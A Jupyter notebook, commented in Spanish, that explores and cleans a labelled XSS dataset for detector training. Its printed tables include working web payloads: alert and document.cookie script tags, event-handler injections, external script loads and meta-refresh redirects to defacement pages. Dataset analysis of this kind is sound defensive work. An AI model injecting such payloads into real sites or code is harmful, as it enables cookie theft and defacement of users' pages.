In [1]:
import os
from pathlib import Path

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt

pd.set_option("display.max_colwidth", 200)
plt.rcParams["figure.figsize"] = (8, 4)

# =========================
# 1. Detectar BASE_DIR
# =========================
cwd = Path.cwd()

def is_project_root(path: Path) -> bool:
    markers = ["requirements.txt", "app", "notebooks"]
    return any((path / m).exists() for m in markers)

if is_project_root(cwd):
    BASE_DIR = cwd
elif cwd.name in {"notebooks", "src"} and is_project_root(cwd.parent):
    BASE_DIR = cwd.parent
else:
    BASE_DIR = cwd

NOTEBOOKS_DIR = BASE_DIR / "notebooks"
NB_DATA_DIR = NOTEBOOKS_DIR / "data"
OUTPUT_DIR = NB_DATA_DIR / "data_processed"

PATH_COMBINED = OUTPUT_DIR / "xss_combined_clean_final.csv"

print("CWD          :", cwd)
print("BASE_DIR     :", BASE_DIR)
print("OUTPUT_DIR   :", OUTPUT_DIR)
print("COMBINED CSV :", PATH_COMBINED)

# =========================
# 2. Cargar dataset combinado final
# =========================

df = pd.read_csv(PATH_COMBINED)

print("\n=== Shape del dataset combinado ===")
print(df.shape)

print("\n=== Columnas ===")
print(df.columns.tolist())

print("\n=== Tipos de datos ===")
print(df.dtypes)

print("\n=== Distribución de Label ===")
print(df["Label"].value_counts(dropna=False))

print("\n=== Distribución por source ===")
print(df["source"].value_counts(dropna=False))

print("\n=== Primeras filas ===")
display(df.head(10))

print("\n=== Estadísticas de longitud (len_after_clean) ===")
print(df["len_after_clean"].describe())

print("\n=== Top 15 families_str ===")
print(df["families_str"].value_counts().head(15))


CWD          : d:\Archivos de Usuario\Documents\xss-cookie\notebooks
BASE_DIR     : d:\Archivos de Usuario\Documents\xss-cookie
OUTPUT_DIR   : d:\Archivos de Usuario\Documents\xss-cookie\notebooks\data\data_processed
COMBINED CSV : d:\Archivos de Usuario\Documents\xss-cookie\notebooks\data\data_processed\xss_combined_clean_final.csv

=== Shape del dataset combinado ===
(15351, 5)

=== Columnas ===
['Sentence_clean', 'Label', 'families_str', 'len_after_clean', 'source']

=== Tipos de datos ===
Sentence_clean     object
Label               int64
families_str       object
len_after_clean     int64
source             object
dtype: object

=== Distribución de Label ===
1    11703
0     3648
Name: Label, dtype: int64

=== Distribución por source ===
kaggle    10835
github     4516
Name: source, dtype: int64

=== Primeras filas ===


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source
0,"<li><a href=""/wiki/File:Socrates.png"" class=""image""><img alt=""Socrates.png"" src=""//upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Socrates.png/18px-Socrates.png"" decoding=""async"" width=""18"" hei...",0,image_tag,557,kaggle
1,"<tt onmouseover=""alert(1)"">test</tt>",1,event_handler,36,kaggle
2,"</span> <span class=""reference-text"">Steering for the 1995 ""<a href=""/wiki/History_of_autonomous_cars#1990s"" class=""mw-redirect"" title=""History of autonomous cars"">No Hands Across America </a>"" re...",0,other,230,kaggle
3,"</span> <span class=""reference-text""><cite class=""citation web""><a rel=""nofollow"" class=""external text"" href=""https://www.mileseducation.com/finance/artificial_intelligence"">""Miles Education | Fut...",0,maybe_polyglot,392,kaggle
4,"</span>. <a href=""/wiki/Digital_object_identifier"" title=""Digital object identifier"">doi </a>:<a rel=""nofollow"" class=""external text"" href=""https://doi.org/10.1016%2FS0921-8890%2805%2980025-9"">10....",0,other,419,kaggle
5,"<li id=""cite_note-118""><span class=""mw-cite-backlink""><b><a href=""#cite_ref-118"">^ </a> </b>",0,other,92,kaggle
6,"<li><a href=""/wiki/Contextualism"" title=""Contextualism"">Contextualism </a> </li>",0,other,80,kaggle
7,"<li id=""cite_note-Representing_causation-95""><span class=""mw-cite-backlink"">^ <a href=""#cite_ref-Representing_causation_95-0""><sup><i><b>a </b> </i> </sup> </a> <a href=""#cite_ref-Representing_cau...",0,other,243,kaggle
8,"<tr><td class=""plainlist"" style=""padding:0 0.1em 0.4em"">",0,other,56,kaggle
9,</span>,0,other,7,kaggle



=== Estadísticas de longitud (len_after_clean) ===
count    15351.000000
mean       117.233470
std        204.133168
min          5.000000
25%         44.000000
50%         61.000000
75%        102.000000
max       2854.000000
Name: len_after_clean, dtype: float64

=== Top 15 families_str ===
event_handler                        6082
other                                2963
script_tag                           2651
maybe_polyglot                        704
event_handler|maybe_polyglot          696
script_tag|marquee_tag|header_tag     300
event_handler|svg_tag                 188
iframe_tag                            184
img_tag|event_onerror                 146
event_onmouseover                     123
script_tag|header_tag                 110
marquee_tag|header_tag                 90
body_tag|event_onload                  81
event_handler|image_tag                76
img_tag                                60
Name: families_str, dtype: int64


In [4]:
# ================================
# Análisis profundo – Parte 1
# ================================

import pandas as pd
import numpy as np

print("Shape:", df.shape)

# Aumentamos el máximo de filas que muestra pandas para que NO corte familias
pd.set_option("display.max_rows", 200)

# =======================================================
# 1. Distribución de familias por fuente (Kaggle vs GitHub)
# =======================================================

print("\n=== Distribución de familias por 'source' (tabla legible) ===")

# Conteo por (families_str, source) en formato largo
fam_counts_long = (
    df.groupby(["families_str", "source"])
      .size()
      .reset_index(name="count")
)

# Pivot para tener columnas 'kaggle' y 'github' y filas = families_str
fam_counts = (
    fam_counts_long
    .pivot(index="families_str", columns="source", values="count")
    .fillna(0)
    .astype(int)
)

# Agregar columna 'total' y ordenar por total descendente
fam_counts["total"] = fam_counts.sum(axis=1)
fam_counts = fam_counts.sort_values("total", ascending=False)

display(fam_counts)

print("\nNúmero total de familias distintas:", fam_counts.shape[0])

print("\n=== Todas las familias en Kaggle (conteo) ===")
familias_kaggle = df[df["source"] == "kaggle"]["families_str"].value_counts()
display(familias_kaggle)
print("Número de familias distintas en Kaggle:", familias_kaggle.shape[0])

print("\n=== Todas las familias en GitHub (conteo) ===")
familias_github = df[df["source"] == "github"]["families_str"].value_counts()
display(familias_github)
print("Número de familias distintas en GitHub:", familias_github.shape[0])

# =======================================================
# 2. Pureza: porcentaje de ataques por familia
# =======================================================

print("\n=== Pureza por familia (proporción de Label=1) ===")
purity = df.groupby("families_str")["Label"].mean().sort_values(ascending=False)
display(purity)

# familias con ataques casi puros (>95%)
attack_pure = purity[purity > 0.95]
print("\nFamilias casi 100% ataque (pureza > 0.95):")
display(attack_pure)

# familias con mezcla fuerte (<70%)
mixed = purity[purity < 0.7]
print("\nFamilias mixtas (pureza < 0.7, posible ruido):")
display(mixed)

# =======================================================
# 3. Estadísticas de longitud por familia
# =======================================================

print("\n=== Longitud por familia (describe por families_str) ===")
len_stats = (
    df.groupby("families_str")["len_after_clean"]
      .describe()
      .sort_values("mean", ascending=False)
)
display(len_stats)

print("\n=== Familias con longitud promedio > 300 (payloads muy largos) ===")
display(len_stats[len_stats["mean"] > 300])

# =======================================================
# 4. Detección de families_str inconsistentes
# =======================================================

print("\n=== Payloads con <script ...> pero marcados como 'other' ===")
mask_inconsistent = (
    df["Sentence_clean"].str.contains("<script", case=False, na=False)
    & (df["families_str"] == "other")
)
df_inconsistent = df[mask_inconsistent]
print("Total inconsistentes script/other:", df_inconsistent.shape[0])
display(df_inconsistent)

print("\n=== Payloads con onXXX= pero sin 'event_' en families_str ===")
mask_event_missing = (
    df["Sentence_clean"].str.contains(r"on[a-z]+\s*=", case=True, regex=True, na=False)
    & ~df["families_str"].str.contains("event_", na=False)
)
df_event_missing = df[mask_event_missing]
print("Total inconsistentes onXXX sin event_:", df_event_missing.shape[0])
display(df_event_missing)

# =======================================================
# 5. Duplicados aproximados (misma longitud y misma familia)
# =======================================================

print("\n=== Posibles duplicados por longitud + familia (todas las combinaciones ordenadas por frecuencia) ===")
dup_groups = (
    df.groupby(["len_after_clean", "families_str"])
      .size()
      .sort_values(ascending=False)
)
display(dup_groups)


Shape: (15351, 5)

=== Distribución de familias por 'source' (tabla legible) ===


source,github,kaggle,total
families_str,Unnamed: 1_level_1,Unnamed: 2_level_1,Unnamed: 3_level_1
event_handler,0,6082,6082
other,131,2832,2963
script_tag,2610,41,2651
maybe_polyglot,0,704,704
event_handler|maybe_polyglot,0,696,696
script_tag|marquee_tag|header_tag,300,0,300
event_handler|svg_tag,0,188,188
iframe_tag,182,2,184
img_tag|event_onerror,146,0,146
event_onmouseover,123,0,123



Número total de familias distintas: 153

=== Todas las familias en Kaggle (conteo) ===


event_handler                                      6082
other                                              2832
maybe_polyglot                                      704
event_handler|maybe_polyglot                        696
event_handler|svg_tag                               188
event_handler|image_tag                              76
image_tag                                            55
script_tag|event_handler                             54
event_handler|iframe_tag                             47
script_tag                                           41
javascript_uri                                       24
javascript_uri|image_tag                             10
event_handler|iframe_tag|maybe_polyglot               5
event_handler|svg_tag|maybe_polyglot                  5
event_handler|javascript_uri                          3
iframe_tag                                            2
script_tag|event_handler|image_tag                    1
script_tag|image_tag                            

Número de familias distintas en Kaggle: 27

=== Todas las familias en GitHub (conteo) ===


script_tag                                                                 2610
script_tag|marquee_tag|header_tag                                           300
iframe_tag                                                                  182
img_tag|event_onerror                                                       146
other                                                                       131
event_onmouseover                                                           123
script_tag|header_tag                                                       110
marquee_tag|header_tag                                                       90
body_tag|event_onload                                                        81
img_tag                                                                      60
script_tag|iframe_tag                                                        52
text_container_tag                                                           51
event_onload                            

Número de familias distintas en GitHub: 129

=== Pureza por familia (proporción de Label=1) ===


families_str
body_tag                                                                   1.000000
script_tag|body_tag|plain_tag                                              1.000000
script_tag|body_tag|text_container_tag                                     1.000000
script_tag|event_handler                                                   1.000000
script_tag|event_handler|image_tag                                         1.000000
script_tag|event_handler|javascript_uri|svg_tag                            1.000000
script_tag|event_onerror                                                   1.000000
script_tag|event_onload                                                    1.000000
script_tag|event_onmouseover                                               1.000000
script_tag|event_onreadystatechange                                        1.000000
script_tag|header_tag                                                      1.000000
script_tag|header_tag|plain_tag                                


Familias casi 100% ataque (pureza > 0.95):


families_str
body_tag                                                                   1.000000
script_tag|body_tag|plain_tag                                              1.000000
script_tag|body_tag|text_container_tag                                     1.000000
script_tag|event_handler                                                   1.000000
script_tag|event_handler|image_tag                                         1.000000
script_tag|event_handler|javascript_uri|svg_tag                            1.000000
script_tag|event_onerror                                                   1.000000
script_tag|event_onload                                                    1.000000
script_tag|event_onmouseover                                               1.000000
script_tag|event_onreadystatechange                                        1.000000
script_tag|header_tag                                                      1.000000
script_tag|header_tag|plain_tag                                


Familias mixtas (pureza < 0.7, posible ruido):


families_str
image_tag         0.218182
other             0.026662
maybe_polyglot    0.007102
Name: Label, dtype: float64


=== Longitud por familia (describe por families_str) ===


Unnamed: 0_level_0,count,mean,std,min,25%,50%,75%,max
families_str,Unnamed: 1_level_1,Unnamed: 2_level_1,Unnamed: 3_level_1,Unnamed: 4_level_1,Unnamed: 5_level_1,Unnamed: 6_level_1,Unnamed: 7_level_1,Unnamed: 8_level_1
script_tag|iframe_tag|header_tag|text_container_tag|event_onerror,1.0,2413.0,,2413.0,2413.0,2413.0,2413.0,2413.0
text_container_tag|event_onmouseover|event_onclick|event_onfocus,1.0,1954.0,,1954.0,1954.0,1954.0,1954.0,1954.0
text_container_tag|event_onload,2.0,1394.5,1826.456816,103.0,748.75,1394.5,2040.25,2686.0
script_tag|text_container_tag|event_onclick,2.0,1251.5,1089.65155,481.0,866.25,1251.5,1636.75,2022.0
img_tag|text_container_tag|event_onmouseover,1.0,1243.0,,1243.0,1243.0,1243.0,1243.0,1243.0
event_onload|event_onerror,4.0,1217.25,1197.624419,46.0,315.25,1112.0,2014.0,2599.0
script_tag|iframe_tag|body_tag|event_onload,2.0,1192.0,70.710678,1142.0,1167.0,1192.0,1217.0,1242.0
script_tag|body_tag|text_container_tag,1.0,1108.0,,1108.0,1108.0,1108.0,1108.0,1108.0
event_onload|event_onreadystatechange,1.0,1087.0,,1087.0,1087.0,1087.0,1087.0,1087.0
script_tag|event_onload,10.0,1046.0,746.762494,78.0,571.5,1003.5,1413.0,2160.0



=== Familias con longitud promedio > 300 (payloads muy largos) ===


Unnamed: 0_level_0,count,mean,std,min,25%,50%,75%,max
families_str,Unnamed: 1_level_1,Unnamed: 2_level_1,Unnamed: 3_level_1,Unnamed: 4_level_1,Unnamed: 5_level_1,Unnamed: 6_level_1,Unnamed: 7_level_1,Unnamed: 8_level_1
script_tag|iframe_tag|header_tag|text_container_tag|event_onerror,1.0,2413.0,,2413.0,2413.0,2413.0,2413.0,2413.0
text_container_tag|event_onmouseover|event_onclick|event_onfocus,1.0,1954.0,,1954.0,1954.0,1954.0,1954.0,1954.0
text_container_tag|event_onload,2.0,1394.5,1826.456816,103.0,748.75,1394.5,2040.25,2686.0
script_tag|text_container_tag|event_onclick,2.0,1251.5,1089.65155,481.0,866.25,1251.5,1636.75,2022.0
img_tag|text_container_tag|event_onmouseover,1.0,1243.0,,1243.0,1243.0,1243.0,1243.0,1243.0
event_onload|event_onerror,4.0,1217.25,1197.624419,46.0,315.25,1112.0,2014.0,2599.0
script_tag|iframe_tag|body_tag|event_onload,2.0,1192.0,70.710678,1142.0,1167.0,1192.0,1217.0,1242.0
script_tag|body_tag|text_container_tag,1.0,1108.0,,1108.0,1108.0,1108.0,1108.0,1108.0
event_onload|event_onreadystatechange,1.0,1087.0,,1087.0,1087.0,1087.0,1087.0,1087.0
script_tag|event_onload,10.0,1046.0,746.762494,78.0,571.5,1003.5,1413.0,2160.0



=== Payloads con <script ...> pero marcados como 'other' ===
Total inconsistentes script/other: 0


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source



=== Payloads con onXXX= pero sin 'event_' en families_str ===
Total inconsistentes onXXX sin event_: 151


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source
10943,<script>alert(1);</script>&turnoffgoogleads=true&submitstatus=searchformsubmitted&mode=simple&sectionid=980,1,script_tag,107,github
10967,<script>alert(1);</script>&lang=en&otherlang=en&name=tionilla&planet=nonation&username=tionilla&race=5&withstartingfleet=1&startingfleet_id=8&realname=&town=&timezone=+1&age=0&gender=&find=url&url...,1,script_tag,271,github
10969,<script>alert(1);</script>&fields=full&paper=all&search_range=quick&quick=7&amonth=01&aday=01&ayear=2009&bmonth=01&bday=01&byear=2009&pg_len=25&sort_by=story_date&result_type=with,1,script_tag,179,github
10991,"<script>alert(document.cookie)</script><h1>by st@rext trtekforum.com</h1><meta http-equiv=""refresh"" content=""2;url=http://lht.by.ru/uyar1.html"">",1,script_tag|header_tag,144,github
11022,<script src=http://vuln.xssed.net/thirdparty/scripts/python5.js></script>&soumettre=rechercher&nombrereponseparpage=10,1,script_tag,118,github
11049,"<script>alert(""ownz+your+system+by+vagrant"")</script><meta http-equiv=""refresh""content=""0;url=http://www.google.com"">",1,script_tag,117,github
11050,"<script>alert(document.cookie)</script>''><h1>djsedat narcoticxs</h1><meta http-equiv=""refresh""content=""0;url=http://www.sanalkatil.org"">",1,script_tag|header_tag,137,github
11081,<script>alert('xss')</script>&sectionnum=3&idkey=1e9412e00ef6&homeurl=http://patft.uspto.gov/netacgi/nph-parser?sect2=pto1&sect2=hitoff&p=1&u=%2fnetahtml%2fpto%2fsearch-bool.html&r=1&f=g&l=50&d=pa...,1,script_tag,241,github
11103,<script>alert(/xssed/)</script>&proj_name=&zoning=&tmk_no=&proj_city=&dev_name=&unt_ttl1=&unt_ttl2=,1,script_tag,99,github
11155,"<iframe src=""http://xssed.com"">&month=05",1,iframe_tag,40,github



=== Posibles duplicados por longitud + familia (todas las combinaciones ordenadas por frecuencia) ===


len_after_clean  families_str                           
44               event_handler                              228
46               event_handler                              213
42               event_handler                              208
92               other                                      201
48               event_handler                              198
                                                           ... 
110              script_tag|event_handler                     1
                 iframe_tag                                   1
                 event_handler|iframe_tag|maybe_polyglot      1
109              script_tag|img_tag|event_onerror             1
2854             script_tag                                   1
Length: 2797, dtype: int64

In [5]:
# ================================
# Colapsar families_str a 5 clases
# ================================

import pandas as pd

print("Shape actual del df:", df.shape)
print("Columnas:", df.columns.tolist())

# 1) Función de mapeo a familia colapsada
def map_family_main(fam: str) -> str:
    """
    Colapsa families_str en 5 categorías:
      - 'script' : si aparece 'script_tag'
      - 'event'  : si aparece 'event_' (onload, onmouseover, etc.)
      - 'js_uri' : si aparece 'javascript_uri'
      - 'iframe' : si aparece 'iframe_tag'
      - 'benign' : en cualquier otro caso
    El orden de prioridad es:
      script > event > js_uri > iframe > benign
    """
    if pd.isna(fam):
        return "benign"
    s = str(fam)

    # Prioridad 1: script_tag
    if "script_tag" in s:
        return "script"

    # Prioridad 2: cualquier event_*
    if "event_" in s:
        return "event"

    # Prioridad 3: javascript_uri
    if "javascript_uri" in s:
        return "js_uri"

    # Prioridad 4: iframe_tag
    if "iframe_tag" in s:
        return "iframe"

    # Todo lo demás: benign
    return "benign"


# 2) Crear columna family_main
df["family_main"] = df["families_str"].apply(map_family_main)

# 3) (Opcional pero útil) flags binarios por tipo
df["has_script_tag"] = df["families_str"].str.contains("script_tag", na=False)
df["has_event"]      = df["families_str"].str.contains("event_", na=False)
df["has_js_uri"]     = df["families_str"].str.contains("javascript_uri", na=False)
df["has_iframe"]     = df["families_str"].str.contains("iframe_tag", na=False)

# 4) Resumen rápido para verificar
print("\n=== Distribución family_main ===")
print(df["family_main"].value_counts())

print("\n=== family_main vs Label ===")
display(pd.crosstab(df["family_main"], df["Label"], normalize="index").round(3))

print("\n=== Preview con nueva columna ===")
display(df[["Sentence_clean", "Label", "families_str", "family_main", "len_after_clean", "source"]].head(15))


Shape actual del df: (15351, 5)
Columnas: ['Sentence_clean', 'Label', 'families_str', 'len_after_clean', 'source']

=== Distribución family_main ===
event     7667
benign    4030
script    3408
iframe     210
js_uri      36
Name: family_main, dtype: int64

=== family_main vs Label ===


Label,0,1
family_main,Unnamed: 1_level_1,Unnamed: 2_level_1
benign,0.9,0.1
event,0.001,0.999
iframe,0.0,1.0
js_uri,0.0,1.0
script,0.004,0.996



=== Preview con nueva columna ===


Unnamed: 0,Sentence_clean,Label,families_str,family_main,len_after_clean,source
0,"<li><a href=""/wiki/File:Socrates.png"" class=""image""><img alt=""Socrates.png"" src=""//upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Socrates.png/18px-Socrates.png"" decoding=""async"" width=""18"" hei...",0,image_tag,benign,557,kaggle
1,"<tt onmouseover=""alert(1)"">test</tt>",1,event_handler,event,36,kaggle
2,"</span> <span class=""reference-text"">Steering for the 1995 ""<a href=""/wiki/History_of_autonomous_cars#1990s"" class=""mw-redirect"" title=""History of autonomous cars"">No Hands Across America </a>"" re...",0,other,benign,230,kaggle
3,"</span> <span class=""reference-text""><cite class=""citation web""><a rel=""nofollow"" class=""external text"" href=""https://www.mileseducation.com/finance/artificial_intelligence"">""Miles Education | Fut...",0,maybe_polyglot,benign,392,kaggle
4,"</span>. <a href=""/wiki/Digital_object_identifier"" title=""Digital object identifier"">doi </a>:<a rel=""nofollow"" class=""external text"" href=""https://doi.org/10.1016%2FS0921-8890%2805%2980025-9"">10....",0,other,benign,419,kaggle
5,"<li id=""cite_note-118""><span class=""mw-cite-backlink""><b><a href=""#cite_ref-118"">^ </a> </b>",0,other,benign,92,kaggle
6,"<li><a href=""/wiki/Contextualism"" title=""Contextualism"">Contextualism </a> </li>",0,other,benign,80,kaggle
7,"<li id=""cite_note-Representing_causation-95""><span class=""mw-cite-backlink"">^ <a href=""#cite_ref-Representing_causation_95-0""><sup><i><b>a </b> </i> </sup> </a> <a href=""#cite_ref-Representing_cau...",0,other,benign,243,kaggle
8,"<tr><td class=""plainlist"" style=""padding:0 0.1em 0.4em"">",0,other,benign,56,kaggle
9,</span>,0,other,benign,7,kaggle


In [6]:
# ============================================
# ANÁLISIS PROFUNDO – PARTE 2
# ============================================

import pandas as pd
import numpy as np

print("Shape:", df.shape)

# --------------------------------------------------
# 1. Pureza dentro de cada family_main
# --------------------------------------------------
print("\n=== Pureza por family_main (Label=1 ratio) ===")
purity_main = df.groupby("family_main")["Label"].mean().sort_values(ascending=False)
print(purity_main)

print("\n=== Conteo por family_main ===")
print(df["family_main"].value_counts())

print("\n=== Tabla family_main vs Label (conteos) ===")
print(pd.crosstab(df["family_main"], df["Label"]))

print("\n=== Tabla family_main vs Label (porcentaje por fila) ===")
print(pd.crosstab(df["family_main"], df["Label"], normalize='index').round(3))

# --------------------------------------------------
# 2. Longitud (len_after_clean) por family_main
# --------------------------------------------------
print("\n=== Estadísticas de longitud por family_main ===")
len_stats_main = df.groupby("family_main")["len_after_clean"].describe()
print(len_stats_main)

# --------------------------------------------------
# 3. Outliers dentro de BENIGN (posibles ataques ocultos)
# --------------------------------------------------

# Un benigno muy sospechoso podría ser:
# - Largo (>400 chars)
# - Contener cosas tipo <script pero no marcado
# - Contener onXXX pero no marcado
mask_benign_susp_long = (df["family_main"]=="benign") & (df["len_after_clean"]>400)

mask_benign_susp_script = (df["family_main"]=="benign") & df["Sentence_clean"].str.contains("<script", case=False, na=False)

mask_benign_susp_event = (df["family_main"]=="benign") & df["Sentence_clean"].str.contains("on[a-z]+\s*=", regex=True, na=False)

print("\n=== Benign sospechosos por longitud (>400) ===")
display(df[mask_benign_susp_long].head(20))
print("Total:", df[mask_benign_susp_long].shape[0])

print("\n=== Benign sospechosos que contienen <script ===")
display(df[mask_benign_susp_script].head(20))
print("Total:", df[mask_benign_susp_script].shape[0])

print("\n=== Benign sospechosos que contienen onXXX ===")
display(df[mask_benign_susp_event].head(20))
print("Total:", df[mask_benign_susp_event].shape[0])

# --------------------------------------------------
# 4. Inconsistencias fuertes Label=1 pero family_main=benign
# --------------------------------------------------
print("\n=== Ataques (Label=1) clasificados como benign ===")
mask_attack_benign = (df["Label"]==1) & (df["family_main"]=="benign")
display(df[mask_attack_benign].head(30))
print("Total:", df[mask_attack_benign].shape[0])

# --------------------------------------------------
# 5. Inconsistencias fuertes Label=0 pero family_main no benign
# --------------------------------------------------
print("\n=== Benignos (Label=0) clasificados como script/event/iframe/js_uri ===")
mask_benign_nonbenign = (df["Label"]==0) & (df["family_main"]!="benign")
display(df[mask_benign_nonbenign].head(30))
print("Total:", df[mask_benign_nonbenign].shape[0])


Shape: (15351, 10)

=== Pureza por family_main (Label=1 ratio) ===
family_main
iframe    1.000000
js_uri    1.000000
event     0.998957
script    0.995892
benign    0.100248
Name: Label, dtype: float64

=== Conteo por family_main ===
event     7667
benign    4030
script    3408
iframe     210
js_uri      36
Name: family_main, dtype: int64

=== Tabla family_main vs Label (conteos) ===
Label           0     1
family_main            
benign       3626   404
event           8  7659
iframe          0   210
js_uri          0    36
script         14  3394

=== Tabla family_main vs Label (porcentaje por fila) ===
Label            0      1
family_main              
benign       0.900  0.100
event        0.001  0.999
iframe       0.000  1.000
js_uri       0.000  1.000
script       0.004  0.996

=== Estadísticas de longitud por family_main ===
              count        mean         std   min    25%    50%    75%     max
family_main                                                                 

Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
0,"<li><a href=""/wiki/File:Socrates.png"" class=""image""><img alt=""Socrates.png"" src=""//upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Socrates.png/18px-Socrates.png"" decoding=""async"" width=""18"" hei...",0,image_tag,557,kaggle,benign,False,False,False,False
4,"</span>. <a href=""/wiki/Digital_object_identifier"" title=""Digital object identifier"">doi </a>:<a rel=""nofollow"" class=""external text"" href=""https://doi.org/10.1016%2FS0921-8890%2805%2980025-9"">10....",0,other,419,kaggle,benign,False,False,False,False
27,"</span> <span class=""reference-text""><cite class=""citation journal""><a href=""/wiki/Woody_Evans"" title=""Woody Evans"">Evans, Woody </a> (2015). ""Posthuman Rights: Dimensions of Transhuman Worlds"". <...",0,maybe_polyglot,903,kaggle,benign,False,False,False,False
37,"</span>. <i>Behavioral and Brain Sciences </i>. <b>3 </b> (3): 417–457. <a href=""/wiki/Digital_object_identifier"" title=""Digital object identifier"">doi </a>:<a rel=""nofollow"" class=""external text""...",0,other,806,kaggle,benign,False,False,False,False
39,"</span> <span class=""reference-text""><cite class=""citation journal"">Prakken, Henry (31 August 2017). ""On the problem of making autonomous vehicles conform to traffic law"". <i>Artificial Intelligen...",0,maybe_polyglot,952,kaggle,benign,False,False,False,False
77,"</span> <span class=""reference-text"">Celli, Fabio, Pietro Zani Massani, and Bruno Lepri. ""Profilio: Psychometric Profiling to Boost Social Media Advertising."" Proceedings of the 2017 ACM on Multim...",0,other,401,kaggle,benign,False,False,False,False
102,"</span>. </cite><span title=""ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=ZDNet&amp;rft.atitle=Half+of+Americans+do+not+believe+d...",0,maybe_polyglot,486,kaggle,benign,False,False,False,False
104,"<li><cite id=""CITEREFTuring1950"" class=""citation""><a href=""/wiki/Alan_Turing"" title=""Alan Turing"">Turing, Alan </a> (October 1950), ""Computing Machinery and Intelligence"", <i><a href=""/wiki/Mind_(...",0,maybe_polyglot,1160,kaggle,benign,False,False,False,False
130,"</li><li style=""min-height: 31px;""><span style=""display: inline-block; width: 31px; line-height: 31px; vertical-align: middle; text-align: center;""><img alt="""" src=""//upload.wikimedia.org/wikipedi...",0,image_tag,599,kaggle,benign,False,False,False,False
159,"<li><cite id=""CITEREFLenatGuha1989"" class=""citation book""><a href=""/wiki/Douglas_Lenat"" title=""Douglas Lenat"">Lenat, Douglas </a>; Guha, R. V. (1989). <i>Building Large Knowledge-Based Systems </i...",0,maybe_polyglot,853,kaggle,benign,False,False,False,False


Total: 665

=== Benign sospechosos que contienen <script ===


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe


Total: 0

=== Benign sospechosos que contienen onXXX ===


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
11330,"<metahttp-equiv=""refresh"" content=""0;url=http://www.google.com/""> """"",0,other,68,github,benign,False,False,False,False
11343,"<metahttp-equiv=""refresh"" content=""0;url=http://www.cyber-warrior.org/israil/"">",0,other,79,github,benign,False,False,False,False
11590,"<marquee><h1><strong><i>cueballr<+i><+strong><+h1><+marquee>&_keyword='"">><marquee><h1><strong><i>cueballr<+i><+strong><+h1><+marquee>&_choix=ps&_country=&_zone=ww&_region=",1,marquee_tag|header_tag,172,github,benign,False,False,False,False
12518,"<h1>by st@rext<meta http-equiv=""refresh"" content=""1;url=http://lht.by.ru/uyar1.html"">",1,header_tag,85,github,benign,False,False,False,False
12641,<marquee><h1>this_site_is_not_mcafee_secure</h1></marquee>&searchstring=test&product=&document=&cmd=search&productfamily=&contexttype=gs,1,marquee_tag|header_tag,136,github,benign,False,False,False,False
12944,<link href=http://starext.by.ru/css.css type=text/css rel=stylesheet>&reponse=nontrouve,0,other,87,github,benign,False,False,False,False
13848,"<font+size=""20""+color=""green"">�estamos-frente-a-un-problema-de-seguridad-grave</font><marquee>seguridad-help-me :p+</marquee><br><font+<br><font+size=""20""+color=""green"">seguridad-help-""+</font><ma...",1,marquee_tag|text_container_tag,416,github,benign,False,False,False,False
14127,<font+size=72>xss<font>+&zona=resultados-busqueda,1,text_container_tag,49,github,benign,False,False,False,False
14175,"<h1>rubberduck</h1><br><br><marquee>whitehat forever</marquee>&sezona='""><h1>rubberduck</h1><br><br><marquee>whitehat forever</marquee>",1,marquee_tag|header_tag,135,github,benign,False,False,False,False
14199,"<metahttp-equiv=""refresh"" content=""0;url=http://www.google.com/"">""""&forgot_email=&forgot_password=&form_submit=forgot_code&mod_id=6&verify_password=",0,other,148,github,benign,False,False,False,False


Total: 42

=== Ataques (Label=1) clasificados como benign ===


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
71,"<A HREF=""http://ha.ckers.org@google""></A>",1,other,41,kaggle,benign,False,False,False,False
178,document.write,1,other,14,kaggle,benign,False,False,False,False
257,"SRC=""http://ha.ckers.org/.swf"" AllowScriptAccess=""always""",1,other,57,kaggle,benign,False,False,False,False
268,"d=""alert('');\\"")"";",1,other,18,kaggle,benign,False,False,False,False
300,header('Location: '.$_GET['param']);,1,maybe_polyglot,36,kaggle,benign,False,False,False,False
399,[1].find(alert),1,other,15,kaggle,benign,False,False,False,False
424,"<Input value = """" type = text>",1,other,30,kaggle,benign,False,False,False,False
516,<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe,1,other,107,kaggle,benign,False,False,False,False
519,document.documentURI,1,other,20,kaggle,benign,False,False,False,False
520,Set.constructor`alert\\x28document.domain\\x29```,1,other,47,kaggle,benign,False,False,False,False


Total: 404

=== Benignos (Label=0) clasificados como script/event/iframe/js_uri ===


Unnamed: 0,Sentence_clean,Label,families_str,len_after_clean,source,family_main,has_script_tag,has_event,has_js_uri,has_iframe
108,"<script src=""_static/js/hoverxref.js""></script>",0,script_tag,47,kaggle,script,True,False,False,False
406,</script>,0,script_tag,9,kaggle,script,True,False,False,False
1208,"<script src=""_static/jquery.js""></script>",0,script_tag,41,kaggle,script,True,False,False,False
1720,"<script type=""text/javascript"">",0,script_tag,31,kaggle,script,True,False,False,False
1812,"<script src=""_static/language_data.js""></script>",0,script_tag,48,kaggle,script,True,False,False,False
2134,"<meta name=""viewport"" content=""width=device-width, initial-scale=1.0"">",0,event_handler,70,kaggle,event,False,True,False,False
2420,"<meta name=""generator"" content=""MediaWiki 1.35.0-wmf.22""/>",0,event_handler,58,kaggle,event,False,True,False,False
2769,"<script type=""text/javascript"" src=""_static/readthedocs-data.js""></script>",0,script_tag,74,kaggle,script,True,False,False,False
3287,"<script type=""text/javascript"" src=""_static/js/modernizr.min.js""></script>",0,script_tag,74,kaggle,script,True,False,False,False
